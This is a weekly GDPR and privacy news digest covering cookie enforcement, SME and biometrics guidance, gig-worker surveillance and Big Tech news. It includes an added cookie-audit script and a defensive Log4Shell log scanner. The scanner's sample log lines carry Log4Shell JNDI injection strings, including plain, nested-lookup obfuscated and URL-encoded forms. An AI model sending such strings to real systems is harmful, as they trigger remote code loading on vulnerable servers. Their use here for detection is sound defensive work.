The CNIL is also continuing its action plan to ensure compliance by companies that use cookies. Since May 2021 the CNIL has sent out around 60 formal notices. Online checks have revealed that a number of organizations still do not allow online users to refuse cookies as easily as to accept them. The CNIL decided to send 30 new formal notices. The recent checks observe that:

  • cookies, subject to consent, were automatically placed on the user’s terminal equipment before acceptance;
  • information banners are still not compliant because they do not allow the user to refuse cookies as easily as accepting them;
  • information banners can offer the user a means of refusing cookies with the same degree of simplicity as that provided for accepting them, but the proposed mechanism is not effective because cookies, subject to consent, are still placed after the refusal expressed by the user.

The following are particularly affected by these new formal notices: public establishments, higher education establishments, the clothing industry, transport sector, mass distribution sector, and distance selling sector.
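The three defects the CNIL lists are easy to turn into an acceptance test. The following is an added Python example, not CNIL tooling or any site’s real code: two constructed server-side cookie policies (one compliant, one with the defect pattern), a snapshot of the cookie jar at the three points an auditor compares, and an audit that reports one finding per defect. Cookie names, the essential/consent split and the click counts are invented; against a real site the snapshots would come from a browser automation run in a fresh profile for each branch.

```python
# Added example modelled on the three defects in the CNIL formal notices;
# not CNIL's own checks. Cookie names and both site behaviours are constructed.

ESSENTIAL = {"session_id", "csrf_token", "consent_choice"}  # exempt from consent
CONSENT_REQUIRED = {"_ga", "_fbp", "ad_id"}                  # analytics / ads


def page_load_compliant(consent):
    """Cookies a compliant server sets on one page load.
    consent is None (no choice made yet), 'accepted' or 'refused'."""
    cookies = {"session_id", "csrf_token"}
    if consent is not None:
        cookies.add("consent_choice")  # the record of the choice itself is exempt
    if consent == "accepted":
        cookies |= CONSENT_REQUIRED    # only placed once consent exists
    return cookies


def page_load_defective(consent):
    """The pattern in the notices: an analytics tag fires on load and ignores refusal."""
    cookies = {"session_id", "csrf_token", "_ga"}
    if consent is not None:
        cookies.add("consent_choice")
    if consent == "accepted":
        cookies |= CONSENT_REQUIRED
    return cookies


def record_flow(page_load):
    """Snapshot the cookie jar at the three points an auditor compares."""
    return {
        "before_choice": page_load(None),
        "after_refuse": page_load("refused"),
        "after_accept": page_load("accepted"),
    }


def audit(snapshots, accept_clicks, refuse_clicks):
    """Return one finding string per defect; an empty list means the flow passed."""
    findings = []
    early = sorted(snapshots["before_choice"] & CONSENT_REQUIRED)
    if early:
        findings.append(f"placed before any choice: {early}")
    if refuse_clicks > accept_clicks:
        findings.append(f"refusing takes {refuse_clicks} clicks, accepting {accept_clicks}")
    ignored = sorted(snapshots["after_refuse"] & CONSENT_REQUIRED)
    if ignored:
        findings.append(f"still present after refusal: {ignored}")
    unknown = sorted((snapshots["after_accept"] - ESSENTIAL) - CONSENT_REQUIRED)
    if unknown:
        findings.append(f"unclassified cookies, add them to the register: {unknown}")
    return findings


if __name__ == "__main__":
    print("compliant:", audit(record_flow(page_load_compliant), 1, 1))
    print("defective:", audit(record_flow(page_load_defective), 1, 3))
```

The last check is the one teams most often skip: a cookie that is neither in the essential list nor in the consent register has no documented basis, which is exactly what an inspector will ask about first.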

In Germany, the Saxony-Anhalt data protection commissioner published a guide for small and medium-sized companies (in German only). Craftsmen, merchants and freelancers in various industries collect, store and use personal data from customers, employees or suppliers, often in a variety of ways, and must comply with data protection law. The State Commissioner has long received numerous inquiries from these companies, such as: 

  • What customer or employee data is a company allowed to collect? 
  • How long may the data be stored? 
  • What should be done when customers exercise their data protection rights or employee data has been encrypted by a cyber attack?

Answers to these and many other typical questions are provided by the State Commissioner in the newly published guide. Read the full text here.

The Belgian data protection authority published its final recommendation on the use of biometrics (in French and Dutch). Biometric data qualifies as a special category of personal data (Art. 9 GDPR), which is subject to a general prohibition on processing unless a specific derogation applies, such as the explicit consent of the data subject or necessity for reasons of substantial public interest. Since there is currently no legal norm in Belgian law that authorises the processing of biometric data for the authentication of individuals, and insofar as explicit consent cannot be invoked, such processing is currently performed without a legal basis. Other key takeaways are:  

  • it is important to consider whether the performance of a contract or the provision of a service is conditioned on the consent being provided; 
  • a presumption that consent is not “freely given” exists in particular in employer-employee relationships and where a product or service has a (quasi-)monopoly in the market;
  • purpose limitation, data minimisation and proportionality principles are particularly important for the processing of biometric data;
  • data protection impact assessments will generally be required; 
  • no transition period for companies is provided. 

Opinion: What if your boss was an algorithm?

Privacy International with its partners have teamed up to challenge the unprecedented surveillance that gig economy workers are facing from their employers. They decided to file over 500 data subject access requests, (DSARs), to seven companies – Amazon Flex, Bolt, Deliveroo, Free Now, Just Eat, Ola, and Uber. They also interviewed gig-workers. According to their report, several gig economy employers seem reluctant to fully comply with their data protection obligations. The investigation was unable to obtain information about how algorithms calculate a score which is then used to prioritise dispatch of journeys to drivers. Some companies also failed to provide the guidance documents or location data that is gathered. Finally, the report demonstrates that surveillance is not just vast data collection, but also the use of more invasive technologies. The report provides specific examples where facial recognition technology ended up locking drivers out of their account due to potential identity verification failures.

Data security: Log4j follow up

The EU Commission, the EU Agency for Cybersecurity, CERT-EU and the network of the EU’s national computer security incident response teams have been closely following the development of the Log4Shell vulnerability since 10 December. It is a flaw in the well-known open source Java logging package Log4j, which is maintained by the Apache Software Foundation. Log4j is used in a wide array of applications and web services across the globe. Due to the nature of the vulnerability, its ubiquity and the complexity of patching in some of the impacted environments, it is important that all organisations, especially entities that fall under the Network and Information Security Directive, assess their potential exposure as soon as possible. The latest recommendations so far can be found in:
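Separately from those recommendations, one practical part of an exposure assessment is looking back through web access logs for exploitation attempts, which is harder than it sounds because attackers hide the string "jndi" behind nested Log4j lookups and URL encoding. The following is an added Python example, not code from the EU bodies or from the Log4j project: a triage scanner that undoes the `lower`, `upper` and `:-` default-value lookups and URL encoding before matching on `jndi:`, run over a handful of constructed log lines (addresses are from the RFC 5737 documentation ranges). It imitates only those three lookups; a string that relies on any other lookup resolving to a real value is not simulated, and a clean scan is not evidence that a vulnerable Log4j is absent, so inventory and patching remain the actual assessment.

```python
import re
from urllib.parse import unquote

# Added example (not from the EU/ENISA/CERT-EU advisories or the Log4j project):
# a triage scanner that undoes common Log4j lookup obfuscation before matching
# on "jndi:". Sample lines are constructed; addresses are RFC 5737 ranges.

_INNERMOST = re.compile(r"\$\{([^{}]*)\}")        # a ${...} with no nested braces
JNDI_PATTERN = re.compile(r"jndi:([a-z]+):", re.IGNORECASE)


def _resolve(body):
    """Evaluate one innermost ${...} lookup the way Log4j 2.x would, for the
    three lookups attackers use to disguise the string 'jndi'."""
    if body.startswith("lower:"):
        return body[6:].lower()
    if body.startswith("upper:"):
        return body[6:].upper()
    pos = body.find(":-")
    if pos != -1 and not body.lower().startswith("jndi:"):
        return body[pos + 2:]          # unknown lookup -> its default value
    return body                        # e.g. jndi:ldap://...; keep it, drop braces


def normalize(text, max_rounds=50):
    """URL-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return (line number, JNDI scheme) for each line that carries a lookup
    after de-obfuscation; lines without one are skipped."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = JNDI_PATTERN.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower()))
    return hits


# Constructed Apache-style access log lines for the demonstration.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [13/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.11 - - [13/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:${lower:LDAP}://203.0.113.11/x}"',
    '203.0.113.12 - - [13/Dec/2021:10:01:05 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.12%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.8 - - [13/Dec/2021:10:01:06 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOG):
        print(f"line {number}: jndi lookup via {scheme}")
```

Lines 2 to 4 are flagged (plain, nested-lookup and URL-encoded forms), while line 5, a path that merely contains the word "jndi", is not. A hit tells you which hosts were probed and when, which is the input the exposure assessment needs; it does not tell you whether the probe succeeded.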

Big Tech: E2EE, “buy-now, pay-later”, 5G smart factories, smartphones duopoly

Microsoft is rolling out end-to-end encryption, (E2EE), support for Microsoft Teams, the Verge reports. After announcing the feature earlier this year and testing a public preview since October, Teams is getting the E2EE security support for all one-to-one calls. Microsoft currently encrypts data in transit and at rest, allowing authorized services to decrypt content. Microsoft also uses SharePoint encryption to secure at-rest files and OneNote encryption for notes stored in Microsoft Teams. All chat content in Teams is also encrypted in transit and at rest.

US telecom giant Verizon signed a deal with Alphabet’s Google Cloud to use its 5G network and the tech firm’s computing power to offer services such as autonomous robots and smart factories, says Reuters. Telecom companies have been partnering with technology firms to automate businesses and factories to lower costs and speed up data traffic through private 5G networks that do not jostle for speed with others on a public network. Verizon has also been making private 5G deals in several countries and has partnered with other cloud operators such as Microsoft’s Azure and Amazon’s AWS. Reportedly “a camera attached to an autonomous mobile robot will scan packages to maintain inventory and using computer vision, the robot will send details over 5G to an inventory management system, providing real-time analytics”, the companies said.

The US Consumer Financial Protection Bureau, (CFPB), asked five “buy-now, pay-later” companies – Affirm, Afterpay, Klarna, PayPal and Zip Co – for information on their business practices, amid concerns that the financial products are putting consumers and their data at risk. The CFPB is concerned about “accumulating debt, regulatory arbitrage, and data harvesting” and is seeking data on the risks and benefits of the products. As an example, a recent survey by personal finance company Credit Karma found that one-third of US consumers who used “buy-now, pay-later” services have fallen behind on one or more payments, and 72% of those said their credit scores declined.

Apple and Google have a “vice-like grip” over people’s mobile phones, and their duopoly over the market should be investigated by the proposed new regulator, says the UK’s competition authority, the CMA. The two companies effectively control users’ mobile phone experience in the UK, with their operating systems installed on 99.45% of all phones in the country: “Once a consumer buys a phone they are essentially wedded to the ecosystem of one of the two companies – Apple’s App Store or Google’s Play Store and their respective web browsers Safari or Chrome”. The new Digital Markets Unit (DMU), which will be part of the CMA, has been set up in shadow form until the government officially grants it regulatory powers. The DMU will enforce a code of conduct that the tech giants must follow when dealing with rivals and third parties. The code will affect only those companies deemed to have strategic market status, although no tech firms have been officially awarded that status yet, the Guardian reports.

The post Weekly digest December 13 – 19, 2021: Grindr’s privacy fine, guide for SMEs and developers, 5G smart factories appeared first on TechGDPR.
